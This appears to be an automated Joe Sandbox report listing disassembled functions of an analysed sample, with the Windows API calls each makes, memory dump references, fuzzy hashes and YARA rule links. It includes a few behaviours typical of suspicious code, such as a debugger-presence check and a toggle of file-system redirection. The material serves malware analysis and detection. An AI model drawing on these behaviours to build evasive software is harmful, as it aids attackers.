                                        • Opcode Fuzzy Hash: a387e9f9ad645aed1fb1c989724f88c606eedb68d7487a331849b7d181db6184
                                        • Instruction Fuzzy Hash: CB31C570E04344AFEB32CF248865BE6BBECAF06304F1044AEE5D997281C7785A85CF55
                                        Function 00728A3E Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • CloseHandle.KERNELBASE(00000000,00000000,?,?,0072895C,?,007B9CE8,0000000C), ref: 00728A94
                                        • GetLastError.KERNEL32(?,0072895C,?,007B9CE8,0000000C), ref: 00728A9E
                                        • __dosmaperr.LIBCMT ref: 00728AC9
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: CloseErrorHandleLast__dosmaperr
                                        • String ID:
                                        • API String ID: 2583163307-0
                                        • Opcode ID: 3c8786aa258c712446939be49d2a70b742446e67c92ccf4d2c5ffe89b3c2f535
                                        • Instruction ID: fb113c7b1a4c44990e8440305d78e4f71138028ae5970ddfa9c1b76744367ffb
                                        • Opcode Fuzzy Hash: 3c8786aa258c712446939be49d2a70b742446e67c92ccf4d2c5ffe89b3c2f535
                                        • Instruction Fuzzy Hash: 06016F32607170C6D6A423347889B7E27654B81734F29C22EF8089B1D3DE7E8C804292
                                        Function 0072971B Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • SetFilePointerEx.KERNELBASE(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,007297CA,FF8BC369,00000000,00000002,00000000), ref: 00729754
                                        • GetLastError.KERNEL32(?,007297CA,FF8BC369,00000000,00000002,00000000,?,00725EF1,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00716F61), ref: 0072975E
                                        • __dosmaperr.LIBCMT ref: 00729765
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: ErrorFileLastPointer__dosmaperr
                                        • String ID:
                                        • API String ID: 2336955059-0
                                        • Opcode ID: 09bb29bdc21466ada50da13aa50d3be4811fc13260e0e06cddaf780d376ad9f4
                                        • Instruction ID: b8cb010fd869018338a2d3f86e8a364968275a92380ae903ac75bb55872be19a
                                        • Opcode Fuzzy Hash: 09bb29bdc21466ada50da13aa50d3be4811fc13260e0e06cddaf780d376ad9f4
                                        • Instruction Fuzzy Hash: B8014C32620128EBCB059FA9EC09CAE3B3ADF85330F280219F9159B3D1EA74DD418790
                                        Function 00702AD0 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                                        Download Yara Rule
                                        APIs
                                        • __Init_thread_footer.LIBCMT ref: 00702FB6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Init_thread_footer
                                        • String ID: CALL
                                        • API String ID: 1385522511-4196123274
                                        • Opcode ID: 10e6866a05da241c42f5800d4b2d25f00afd2a8556caa8ca3a693d7effaf6b50
                                        • Instruction ID: 6db77b4ae3cc5a7e011f01b8c5ba688539587843ea05b9c877390ce81d08d49e
                                        • Opcode Fuzzy Hash: 10e6866a05da241c42f5800d4b2d25f00afd2a8556caa8ca3a693d7effaf6b50
                                        • Instruction Fuzzy Hash: 6C229D71608201DFC714DF14C488B2ABBF5BF85314F148A5DF4968B3A2D779E986CB92
                                        Function 006F41E6 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 51COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,006F33E9,007C2418,?,?,?,?,?,?,?,006F32EF,?), ref: 006F4227
                                          • Part of subcall function 006F84B7: _wcslen.LIBCMT ref: 006F84CA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: FullNamePath_wcslen
                                        • String ID: $|
                                        • API String ID: 4019309064-1282033709
                                        • Opcode ID: 4e495c603c043f6090d7e86a9c7929ad5fed80c2fdfeae343edc748221092a78
                                        • Instruction ID: bd1706fb5a3d5594cc940bdfa743bb54ada9447b1cc724a39001db2ff7371932
                                        • Opcode Fuzzy Hash: 4e495c603c043f6090d7e86a9c7929ad5fed80c2fdfeae343edc748221092a78
                                        • Instruction Fuzzy Hash: 7A11C83150420C9BCB54EBA49801EEE73FEAF08350F0040B9F645D76D2DE78EB858B15
                                        Function 0074E6E1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 11COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetComputerNameW.KERNEL32(?,?), ref: 0074E6F3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: ComputerName
                                        • String ID: X64
                                        • API String ID: 3545744682-893830106
                                        • Opcode ID: a7bcfc772df194f7ced015466ee63a02598ab7141ddfa8842b6a913c8993b155
                                        • Instruction ID: 141786918f90164cd75aac3dbf66dc4a975f97075968143043c651bf1fba7631
                                        • Opcode Fuzzy Hash: a7bcfc772df194f7ced015466ee63a02598ab7141ddfa8842b6a913c8993b155
                                        • Instruction Fuzzy Hash: 79D0C9B5805228EACBA0DF80DC88DDDB3BCBB14310F204956F402A2040D73869489B11
                                        Function 007695F6 Relevance: 3.1, APIs: 2, Instructions: 62COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 006F557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006F5558,?,?,00734B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 006F559E
                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00769665
                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00769673
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: PrivateProfileStringWrite$FullNamePath
                                        • String ID:
                                        • API String ID: 3876400906-0
                                        • Opcode ID: 8effd2d78f65497dd879e8f29794eed8abe238df51f7f9aa82c3d14722864f61
                                        • Instruction ID: 8d7716db723c89d79d6baab7efd76afb02562ffaba7ce7316c03ff7602aa6f8a
                                        • Opcode Fuzzy Hash: 8effd2d78f65497dd879e8f29794eed8abe238df51f7f9aa82c3d14722864f61
                                        • Instruction Fuzzy Hash: 7A1119796006299FCB10EB64C840D7EB7B6FF48360B058488ED56AB362CB34FD01CB94
                                        Function 006F6E52 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,006F3B33,?,00008000), ref: 006F6E80
                                        • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,006F3B33,?,00008000), ref: 007359A2
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: deac52e0baf28da55e3f06ca612472128044507e7863e387ce774f4c3067a4af
                                        • Instruction ID: 1f3ed0c35dcb1330e6693465cdf07eb5522a775e77fc150d38cebaaf9ce5c65c
                                        • Opcode Fuzzy Hash: deac52e0baf28da55e3f06ca612472128044507e7863e387ce774f4c3067a4af
                                        • Instruction Fuzzy Hash: 3901B532149229B6E3700A26CC0EFA77F99EF06770F10C310BE98AA1E0C7B45855CB94
                                        Function 006F32A2 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                        Download Yara Rule
                                        APIs
                                        • IsThemeActive.UXTHEME ref: 006F32C4
                                          • Part of subcall function 006F326D: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 006F3282
                                          • Part of subcall function 006F326D: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 006F3299
                                          • Part of subcall function 006F3312: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,006F32EF,?), ref: 006F3342
                                          • Part of subcall function 006F3312: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,006F32EF,?), ref: 006F3355
                                          • Part of subcall function 006F3312: GetFullPathNameW.KERNEL32(00007FFF,?,?,007C2418,007C2400,?,?,?,?,?,?,006F32EF,?), ref: 006F33C1
                                          • Part of subcall function 006F3312: SetCurrentDirectoryW.KERNELBASE(?,00000001,007C2418,?,?,?,?,?,?,?,006F32EF,?), ref: 006F3442
                                        • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 006F32FE
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                        • String ID:
                                        • API String ID: 1550534281-0
                                        • Opcode ID: 8d71bd09ec1f5d4d47809fafeb93138b7a8b02a14aef3e57dc6d95f4b252a602
                                        • Instruction ID: 3460913f54872c07c3521fe1cb0bb73a461186159c62cd3d622d88a9c43b4627
                                        • Opcode Fuzzy Hash: 8d71bd09ec1f5d4d47809fafeb93138b7a8b02a14aef3e57dc6d95f4b252a602
                                        • Instruction Fuzzy Hash: 38F05EB25547C8DFE300AF64EC0AF643B91A704709F10C82EB609862E3CFBE85528B18
                                        Function 0070F95E Relevance: 3.0, APIs: 2, Instructions: 29sleeptimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: SleepTimetime
                                        • String ID:
                                        • API String ID: 346578373-0
                                        • Opcode ID: 1c7ca635282cace0f7b3f18d2d2e16dc159b456c9f0eb4357cfa2b63558c0fd4
                                        • Instruction ID: fd0a03a5eee7640f6dad41c4992eaeedea12f05bdb47e0a88b1936e8abf51221
                                        • Opcode Fuzzy Hash: 1c7ca635282cace0f7b3f18d2d2e16dc159b456c9f0eb4357cfa2b63558c0fd4
                                        • Instruction Fuzzy Hash: 97F082712406099FD354EF65D509B66B7E6FF45360F00402DE55AC73A0DB74AC00CB95
                                        Function 006F8774 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                        Download Yara Rule
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000002,00000001,?,?,?,006FAE65,?,?,?), ref: 006F8793
                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,006FAE65,?,?,?), ref: 006F87C9
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide
                                        • String ID:
                                        • API String ID: 626452242-0
                                        • Opcode ID: 071f83ad427a2a91215504cfbfe34bf18236246152e5f619a49535da272904bd
                                        • Instruction ID: 5f3d66c2a85f634207a48c0287d97e3cfcd2ccb8f744e721f59e019b60175fb8
                                        • Opcode Fuzzy Hash: 071f83ad427a2a91215504cfbfe34bf18236246152e5f619a49535da272904bd
                                        • Instruction Fuzzy Hash: E301FC713401087FEB1867699C4BFBF7AAEDF84740F10407DB101DA1D0DDA09C005264
                                        Function 0071F126 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 543893691077792d9c552353462efd9b74dc6f0e4ce5f5f9cc64d3cccc94f463
                                        • Instruction ID: 76917b4ea49cfb35e22276f3349ea36db4a23c9883a270ce248a6f8e8645d588
                                        • Opcode Fuzzy Hash: 543893691077792d9c552353462efd9b74dc6f0e4ce5f5f9cc64d3cccc94f463
                                        • Instruction Fuzzy Hash: F9519475A00118AFDB10DF6CC845AED7BB1BF85364F198168E8489B3D2D779ED82CB90
                                        Function 0075FBCA Relevance: 1.6, APIs: 1, Instructions: 136COMMON
                                        Download Yara Rule
                                        APIs
                                        • CharLowerBuffW.USER32(?,?), ref: 0075FBE3
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: BuffCharLower
                                        • String ID:
                                        • API String ID: 2358735015-0
                                        • Opcode ID: 28171a37f56af956831faeb7ebed3be022d5537131cff35aeb1a3861afa9e76e
                                        • Instruction ID: 454f9609a1852722f583ea9d600e76c00a3911605aa43c442e75ccf07703f816
                                        • Opcode Fuzzy Hash: 28171a37f56af956831faeb7ebed3be022d5537131cff35aeb1a3861afa9e76e
                                        • Instruction Fuzzy Hash: 4A41A6B660020DAFDB11EF68C8859EE77B9EF44311B11453EED1697241EBB4DA48CBA0
                                        Function 00710000 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                        • Instruction ID: 386ba7e2d939efac2623218cfa49e5f31cadd8a3cbd8d9aa75eb9f76ee1bd713
                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                        • Instruction Fuzzy Hash: FA31D374A00105DFC718DF5CC480AA9F7A6FB59300B6886A5E40ACB396D7BAEDC1CBD0
                                        Function 00768E39 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 006F557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006F5558,?,?,00734B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 006F559E
                                        • GetPrivateProfileStringW.KERNEL32(?,?,?,?,0000FFFF,?), ref: 00768EBE
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: FullNamePathPrivateProfileString
                                        • String ID:
                                        • API String ID: 1991638491-0
                                        • Opcode ID: 093336b7fca411e043af7a513c6f63933fb7a33de50e231fdd3ac0d5704721a2
                                        • Instruction ID: bd7942543f270ad2a2e96c4aedd40d987fa074a260c60d58c32193b8c8c63aca
                                        • Opcode Fuzzy Hash: 093336b7fca411e043af7a513c6f63933fb7a33de50e231fdd3ac0d5704721a2
                                        • Instruction Fuzzy Hash: 9F214235600609AFCB10EB54C845CAEB7B6EF49760B044058FA45A73A1CB34BD81DBD4
                                        Function 006F636D Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 006F6332: LoadLibraryA.KERNEL32(kernel32.dll,?,?,006F637F,?,?,006F60AA,?,00000001,?,?,00000000), ref: 006F633E
                                          • Part of subcall function 006F6332: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 006F6350
                                          • Part of subcall function 006F6332: FreeLibrary.KERNEL32(00000000,?,?,006F637F,?,?,006F60AA,?,00000001,?,?,00000000), ref: 006F6362
                                        • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,006F60AA,?,00000001,?,?,00000000), ref: 006F639F
                                          • Part of subcall function 006F62FB: LoadLibraryA.KERNEL32(kernel32.dll,?,?,007354C3,?,?,006F60AA,?,00000001,?,?,00000000), ref: 006F6304
                                          • Part of subcall function 006F62FB: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 006F6316
                                          • Part of subcall function 006F62FB: FreeLibrary.KERNEL32(00000000,?,?,007354C3,?,?,006F60AA,?,00000001,?,?,00000000), ref: 006F6329
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Library$Load$AddressFreeProc
                                        • String ID:
                                        • API String ID: 2632591731-0
                                        • Opcode ID: 15b1e8fcdcdec480db0e0da1c7ccc3056f6a1b8412ad6f5569fa37dfda3c1dc7
                                        • Instruction ID: 72e617bc65d6d7e5b6937560faccfdfc7b0ec76e06c1750ec3d7001b51343d14
                                        • Opcode Fuzzy Hash: 15b1e8fcdcdec480db0e0da1c7ccc3056f6a1b8412ad6f5569fa37dfda3c1dc7
                                        • Instruction Fuzzy Hash: D711273264020CAACB14BB74C803ABD77A3AF51711F10842DFA83A60C1DEB49E459754
                                        Function 00728792 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: __wsopen_s
                                        • String ID:
                                        • API String ID: 3347428461-0
                                        • Opcode ID: 8e61ddf9fc01dbd03e28ee46038f6cba59fbb20680c904fe541e08d720895700
                                        • Instruction ID: d91de844cb2268526d6d23d0cba310d7e5c31cf928c9893f69b6df6fe31ee89e
                                        • Opcode Fuzzy Hash: 8e61ddf9fc01dbd03e28ee46038f6cba59fbb20680c904fe541e08d720895700
                                        • Instruction Fuzzy Hash: 2911487190410AAFCF05DF98E94099E7BF9EF48310F104069F808AB312DA35EA218BA5
                                        Function 006FB050 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ReadFile.KERNELBASE(?,?,00010000,00000000,00000000,?,?,00000000,?,006F6B73,?,00010000,00000000,00000000,00000000,00000000), ref: 006FB0AC
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
